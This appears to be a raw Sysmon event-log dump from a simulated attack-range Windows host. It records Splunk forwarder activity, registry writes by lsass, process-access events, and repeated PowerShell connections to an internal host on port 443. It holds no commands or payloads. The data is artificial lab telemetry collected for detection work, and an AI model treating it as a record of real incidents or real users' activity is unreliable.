Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3001965FC81D71D5DBA066738F41CCD1,SHA256=70A845B92A18AA54DD6C5320602D32D629FD5DBCBC8E93BA0E2AFB21FEDDA4E8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083356Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:15.250{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56465-false10.0.1.12-8000- 23542300x800000000000000035083358Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:52.851{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B97F96B1B2A63D428FF17386D0B4DA32,SHA256=E09F8D1C40FCC131DD349D36564DACA78704B7C3B75F0A3B269482C9EEB19C9F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083359Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:53.882{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=126A32A181307C34B3D1CDE5EC3F8611,SHA256=5BC189BFB268D393FB9B1571CB2001CAC041FFB730A58DA9C36199E892929326,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083361Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:54.902{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=24DFE90A5FBA3CCDEAF1696E4C47A180,SHA256=6F3067212B8DA55433C5A066DCED86328CBD05B799A4439788D001CB2D2C6008,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083360Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:54.702{B81B27B7-4013-611D-2700-00000000C801}2076NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=9D45E1BDB6F237A6CF51FFC6A12E6130,SHA256=87EEE278CDF62B2B86AF9CB87BDB04BAFB10272CEA175D83979B0C43158C5AB9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083364Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:55.932{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=912FE32CEAE87E0A3932881FF6849D12,SHA256=0E0A106F69AC618276748D497309047C678F80676CE7FAF94EA2E65A85A8E475,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083363Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.045{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56466-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083362Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:55.264{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=6B1950CFAE5A0728778047C772EF251F,SHA256=1ECC9071A8AC6548C663CCC78A9BABEB671A486ACB7876CA9FB1E98BF13B4244,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083367Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:56.962{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A77EF89058A096BA1B18C85F38AD40D1,SHA256=839E273AC4B7B990090A1A82C2C661DAFF1BD5E343F150582CFB7C169A3E125F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083366Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:21.028{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56468-false10.0.1.12-8000- 354300x800000000000000035083365Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:20.713{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56467-false10.0.1.12-8089- 23542300x800000000000000035083368Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:57.980{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=06E04FD236DDD3EA3844DEE8607ACA45,SHA256=46211165707FD07C9E852F2643B88329CF25FAB4D8ED6F15AECE591A9F0528A6,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083369Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:04:58.996{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CDBAE2C8AB8F7362CD947E44E9484A9D,SHA256=369338B9A7B585E8714711600C98913D3EE2E51BBAD7E1CE360CD812B7D21783,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083372Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:25.054{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56469-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083371Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:00.095{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=BAC046446374F2DD1B17DA6A52A9E831,SHA256=F2C1E3D175231C4C8201C59355FB45E5AD7465D20691F30B39FA981D843F7EFE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083370Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:00.011{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FC68814541B302898B8E85490ACB5AF6,SHA256=1F8EC7733BA903FDF42AA4671A86DFE13E8B7FBB6CE8D5359A384243A8DA0869,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083374Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:26.237{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56470-false10.0.1.12-8000- 23542300x800000000000000035083373Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:01.026{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=337A8F6C1910FA959409FECE59F8582D,SHA256=848E0B3FE75D21E2411E6EB91DA4EE451F8B31E9CDD344FD5DDA3ACA3E3B184F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083375Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:02.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=164CF0922544A689DFA4BE744F71AC78,SHA256=443B785AF56DCB501C386742479E35F423F68D2D841AE4CA394533ED0976CF15,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083376Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:03.057{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0B702A5AFF60EC6A68D8687E10294D29,SHA256=2379D87B85B6F881A2C885C3970DDD6B405F0F3905884A4C68B241700A606D19,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083377Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:04.072{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=92F8B35EECFFA4E1D0764FAB53EF4E10,SHA256=36E69E43CD961802AF1CA475A66FBBB7326BF5C36D7D366867D778827414DCDC,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083378Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:05.088{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7D4F9F628EAEE39EA02FB6D7B66F3147,SHA256=E18D72E53E0E4B8F53EC02202DBF2ED310438110B191AB62BF081241DD77D5F9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083381Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:31.066{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56471-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035083380Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:06.138{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=41D15877E61574D274BD5BD6B5344200,SHA256=25E90E79AD82CE3502C684D11D725F79EB01C0706AB36B72F2227A099EF045AE,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083379Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:06.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2BED036926861D6A4D0C277BEC45E163,SHA256=4BC37BC03D2BB4E704951ADE82A3B14A9BB6C401DB4EA644135F1252EBB33613,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083382Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:07.107{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FEBDD32A6F0A017F2ADC1EB51E3E7612,SHA256=B0920AA0408096CC4EAB6986A80C44F156A03C219AF86C2022FF50627B844637,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083384Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:32.018{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local56472-false10.0.1.12-8000- 23542300x800000000000000035083383Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:08.153{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E498B73DCE8B380918D58F39AD51EB11,SHA256=215B4D43AD206DA68881183E7506969E67AA2E3BD4ABAF0825EAF488FF72DA59,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083385Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:09.168{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0EBF4DF99C63D49524C05F5AFE9D96C,SHA256=4DFF57BDF13D6161EF51E4304CC21FA760DBB62A373660269845F1DFF47F1EF7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 13241300x800000000000000035083396Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035083395Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717a531e) 13241300x800000000000000035083394Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59c-0xd9557678) 13241300x800000000000000035083393Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0x3b19de78) 13241300x800000000000000035083392Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ad-0x9cde4678) 13241300x800000000000000035083391Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeConfidenceDWORD (0x00000006) 13241300x800000000000000035083390Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime\SecureTimeTickCountQWORD (0x00000000-0x717a531e) 13241300x800000000000000035083389Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeLowQWORD (0x01d7a59c-0xd9557678) 13241300x800000000000000035083388Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeEstimatedQWORD (0x01d7a5a5-0x3b19de78) 13241300x800000000000000035083387Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-SetValue2021-09-09 18:05:10.351{B81B27B7-4012-611D-0B00-00000000C801}636C:\Windows\system32\lsass.exeHKLM\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\SecureTimeHighQWORD (0x01d7a5ad-0x9cde4678) 23542300x800000000000000035083386Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:10.236{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9190BB57BBFD92356CF15D2E0EFB48,SHA256=D2A136C39A777FA76C1B9970F632B8A8FCC4FCEB3233E6BCC13683641C9C9AF3,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083398Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:11.286{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FB62D36B2D78C7E74B5B3AB465A33D67,SHA256=34B9F4C13696AA408BBD071A502A6971F5919E12F2F9693BFE9DB360D067D452,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083397Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:11.119{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=68CE814CCF5E3EC096359E31625E50F5,SHA256=50BA06E686505B398D7A1D6BCAA8972F16BFDEF3B5590538725AFDAF0FFB3512,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035083400Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:12.303{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5276D405A2479AA9A7398454A6C35DBD,SHA256=C0A4A91C7DB1B173F386536B303B6E1066F324398A46D49D2832AB4CB1E9E019,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035083399Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:36.078{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local56473-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 10341000x800000000000000035083411Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.588{B81B27B7-4CD9-613A-0F90-03000000C801}45602812C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083410Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083409Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083408Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083407Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083406Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0C00-00000000C801}7325640C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035083405Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4012-611D-0500-00000000C801}420536C:\Windows\system32\csrss.exe{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035083404Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-09 18:05:13.386{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-4CD9-613A-0F90-03000000C801}4560C:\Program 